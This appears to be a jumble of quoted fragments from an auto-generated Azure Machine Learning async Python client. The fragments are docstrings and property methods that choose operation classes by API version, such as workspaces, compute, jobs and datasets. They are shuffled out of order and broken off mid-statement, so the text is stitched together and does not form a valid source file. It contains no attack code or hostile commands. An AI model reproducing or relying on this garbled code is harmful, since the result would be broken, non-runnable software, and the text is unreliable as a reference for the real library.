:class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version =", "on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version", "Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>`", "..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>`", "API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview':", "== '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {}", "the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version ==", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version: *", "API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01:", "'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the", "polls for LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION =", "def spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version", "models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version ==", "* 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config,", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` *", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version:", "else: raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client,", "LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG", "..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models", "API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01:", "PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass", "raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config,", "2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version", "from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not", "@property def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\"", "\"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as", ":mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models", "import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as", "'1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does", "= self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif", "== '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {}", "not described in the profile. :param credential: Credential needed for the client to", "operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends", "import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as", ") -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)", "{} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "== '1.5.0': from ..dataset_dataplane import models return models elif api_version == '1.0.0': from", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01':", "'1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does", "the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\"", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise", "on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version", "..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version))", "Stack, Azure Government, Azure China, etc.). By default, it uses the latest API", "* 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version ==", "_models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)}", "Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>`", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from", "depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version", "API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if", "version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview:", "* 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API", "return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def", "*args, **kwargs): \"\"\"This is a fake class to support current implemetation of MultiApiClientMixin.\"", "= self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version:", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version: *", "from ..model_dataplane import models return models elif api_version == 'v1.0': from ..registry_discovery import", "The api-version parameter sets the default API version if the operation group is", "'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }},", ":class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from", "API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01:", "2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01':", "time between two polls for LRO operations if no Retry-After header is present.", "@property def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\"", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version ==", "== 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {}", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif", "group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on", "operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends", "Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt", "Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>`", "* 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version ==", "'2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "def assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version", "ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version ==", "JobsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "else: raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client,", ":class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations", "\"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on", "not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self):", "get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version =", "def delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0:", "import models return models elif api_version == 'v1.0': from ..runhistory import models return", "'2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version ==", "Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>`", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif", "'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the", "\"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as", "UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..model_dataplane import models return models elif api_version == 'v1.0': from ..registry_discovery import models", "does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>`", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version ==", "v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import", "from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not", "if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version:", "import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass", ":class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version", "..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version", "2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview':", "import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as", "events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version =", "'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API", "version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview':", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version ==", "users to operate on Azure Machine Learning Workspace resources. This ready contains multiple", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from", "\"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as", "\"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as", "1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version", "API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview':", "'2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does", "ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "Government, Azure China, etc.). By default, it uses the latest API version available", "ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass", "version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "\" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] =", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else:", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01':", "on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version", "raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import", "operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends", ":param base_url: Service URL :type base_url: str :param profile: A profile definition, from", "on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version", "DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from", "it uses the latest API version available on public Azure. For production, you", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version ==", "\"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as", "the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\"", "== 'v1.0': from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from", "EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API", "self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise", "# Licensed under the MIT License. See License.txt in the project root for", "self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version", "version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version =", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else:", "def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview:", "== '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API", "Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>`", "'2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version {} is not", "not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self):", "* 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version ==", "subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles =", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: *", "operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version:", "2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: 